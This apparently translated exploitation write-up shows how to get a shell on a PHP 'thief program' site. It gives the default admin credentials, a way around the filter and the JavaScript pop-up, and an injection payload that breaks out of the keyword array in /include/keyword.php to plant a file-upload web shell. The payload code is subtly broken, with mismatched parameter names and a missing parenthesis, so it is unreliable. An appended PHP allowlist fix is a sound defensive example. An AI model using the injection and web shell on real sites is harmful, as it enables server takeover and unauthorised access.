A brief introduction to this application: it is a "thief program", that is, it has no database, so there is no SQL injection to speak of.
The administrator account and password are stored in plain text in /admin/data.php.
Default admin panel path: /admin/index.php
Default account and password: admin
Let's analyze the code to see how a shell can be obtained.
I won't go through the system configuration file. Although it uses double quotes (") instead of single quotes, the double quote turns out to be escaped as well, which has left a group of friends depressed.
Basically, this code is used on every page that writes files.
if (preg_match("/require|include|REQUEST|eval|system|fputs/i", $con)) {
echo "<script>alert('contains invalid characters!');location.href='?id=wyc';</script>";
Some common functions are filtered out, so writing an ordinary one-line shell fails. I will not go further into bypassing the filter; there are many ways to do it.
Next, let's look at the place where the shell is obtained: the SEO optimization settings.
By default, a notice about authorization information is displayed.
Looking closer, though, it is only JavaScript playing tricks, which is simple to deal with.
The Opera browser is used to get past the pop-up window.
The file being edited is /admin/wyc.php. Check the code.
Amazingly, it uses stripslashes... Haha, funny!
The input is saved to the /include/keyword.php file. Let's look at the structure of this file in order to construct the statement.
Okay, it is saved as an array.
Comparing it with the web page, we can see that only the content in the middle of the array is saved.
Now it is clear. We can insert at the beginning, so we first close the array with ) so that it ends, and then add our code.
Don't bother with a one-line shell. Just create a small "pony" shell.
)?><form method="post" action="?hack=niu" enctype="multipart/form-data"><input name="upfile" type="file"><input type="submit" value="OK"></form><?php if ($_GET['hink'] = 'niu') {if (!file_exists($_FILES["upfile"]["name"]) {copy($_FILES["upfile"]["tmp_name"], $_FILES["upfile"]["name"]);}}?>
Let's look at the results.
Okay. It's over.
Fix: see the analysis above.
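One way to close the hole analysed above, as an added example that is not the program's own code: replace the function-name blacklist with an allowlist on each keyword, and let var_export() generate the array so that no submitted character can end it. The helper names and the "return array(...)" layout of the keyword file are assumptions.

```php
<?php
declare(strict_types=1);
// Added example. Helper names and the "return array(...)" layout are assumptions.

/** Split the submitted text into keywords; keep only allowlisted values. */
function parse_keywords(string $raw): array
{
    $out = [];
    foreach (preg_split('/[\r\n,]+/', $raw, -1, PREG_SPLIT_NO_EMPTY) as $item) {
        $item = trim($item);
        // Letters, digits, space, "_" and "-" only, 1 to 64 characters.
        // Quotes, parentheses, "<", ">" and "?" never reach the file.
        if (preg_match('/^[\p{L}\p{N} _-]{1,64}$/u', $item) === 1) {
            $out[] = $item;
        }
    }
    return $out;
}

/** Build the data file; var_export() emits every value as a quoted literal. */
function render_keyword_file(array $keywords): string
{
    return "<?php\nreturn " . var_export(array_values($keywords), true) . ";\n";
}

/** Write to a temp file and rename, so a partial file is never included. */
function save_keywords(string $path, string $raw): int
{
    $keywords = parse_keywords($raw);
    $tmp = $path . '.tmp';
    if (file_put_contents($tmp, render_keyword_file($keywords), LOCK_EX) === false
        || !rename($tmp, $path)) {
        throw new RuntimeException('could not write keyword file');
    }
    return count($keywords);
}

// Constructed input: two ordinary keywords and one that tries to end the array.
$raw  = "news\nfree movies\n)?>INJECTED<?php (";
$path = sys_get_temp_dir() . '/keyword_demo.php';
$saved  = save_keywords($path, $raw);
$loaded = require $path;
echo "saved {$saved}: " . implode(', ', $loaded) . "\n";
// Defence in depth: even without the allowlist, the value is stored as data.
echo var_export(")?>INJECTED<?php (", true) . "\n";
unlink($path);
```

Storing the keywords in a non-executable format such as JSON, outside any file that is included as PHP, removes the code path entirely.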
From: nuclear'atk Network Security Research Center